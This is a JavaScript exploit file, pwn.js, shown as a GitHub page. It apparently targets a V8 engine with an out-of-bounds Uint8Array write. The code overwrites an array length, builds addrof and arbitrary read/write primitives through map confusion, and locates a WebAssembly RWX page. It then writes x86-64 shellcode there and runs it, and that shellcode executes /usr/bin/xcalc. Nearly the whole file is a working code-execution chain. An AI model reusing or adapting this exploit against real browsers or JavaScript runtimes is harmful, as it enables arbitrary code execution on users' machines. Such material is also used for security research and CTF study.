-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathpwn.js
92 lines (73 loc) · 3.21 KB
/
pwn.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
var writer = new Uint8Array(8);
var aux_obj = {"a": 1};
var aux_obj_arr = [aux_obj];
var aux_float_arr = [1.1, 2.2, 3.3];
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) {
f64_buf[0] = val;
return BigInt(u64_buf[0]);
}
writer.fill(0xff, 40, 43); // Overwrite Int8Array(8) length
var isolate_root = BigInt((writer[0x35] << 8) + writer[0x34]);
isolate_root = isolate_root << 32n;
console.log("[+] Isolate root: 0x" + isolate_root.toString(16))
function read32offset(idx, compressed = true) {
if(compressed)
var result = isolate_root;
else
var result = 0n;
for(let i = 0; i < 4; i++)
result += BigInt(writer[idx + i] << (8 * i));
if(compressed)
return BigInt.asUintN(64, result - 1n);
else
return BigInt.asUintN(32, result);
}
function write32offset(idx, data) {
for(let i = 0; i < 4; i++)
writer[idx + i] = Number(data >> (8n * BigInt(i))) & 0xff;
}
function write64offset(idx, data) {
let hi = (data & 0xffffffff00000000n) >> 32n;
let lo = data & 0x00000000ffffffffn;
write32offset(Number(idx), lo);
write32offset(Number(idx) + 4, hi);
}
var obj_arr_map = read32offset(0x84);
var float_arr_map = read32offset(0xb4);
console.log("[+] Object array map: 0x" + obj_arr_map.toString(16));
console.log("[+] Float array map: 0x" + float_arr_map.toString(16));
function addrof(obj) {
aux_obj_arr[0] = obj;
write32offset(0x84, float_arr_map + 1n);
let addr = aux_obj_arr[0];
write32offset(0x84, obj_arr_map + 1n);
return isolate_root + ftoi(addr) - 1n;
}
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,
130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,
128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,
128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,
0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,0,11]);
var wasm_module = new WebAssembly.Module(wasmCode);
var wasm_instance = new WebAssembly.Instance(wasm_module);
var pwn = wasm_instance.exports.main;
var rwx_gap = addrof(wasm_instance) + 0x78n - addrof(writer) - 0x8n;
var rwx = (read32offset(Number(rwx_gap) + 4, false) << 32n) + read32offset(Number(rwx_gap), false);
console.log("[+] RWX section: 0x" + rwx.toString(16));
var arr_buf = new ArrayBuffer(0x100);
var dataview = new DataView(arr_buf);
var back_store_gap = addrof(arr_buf) + 0x24n - addrof(writer) - 0x8n;
var back_store_addr = (read32offset(Number(back_store_gap) + 4, false) << 32n) + read32offset(Number(back_store_gap), false);
console.log("[+] Back store pointer: 0x" + back_store_addr.toString(16));
write64offset(back_store_gap, rwx);
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,
0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,
0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4 * i, shellcode[i], true);
}
console.log("[*] Spawning a calculator...");
pwn();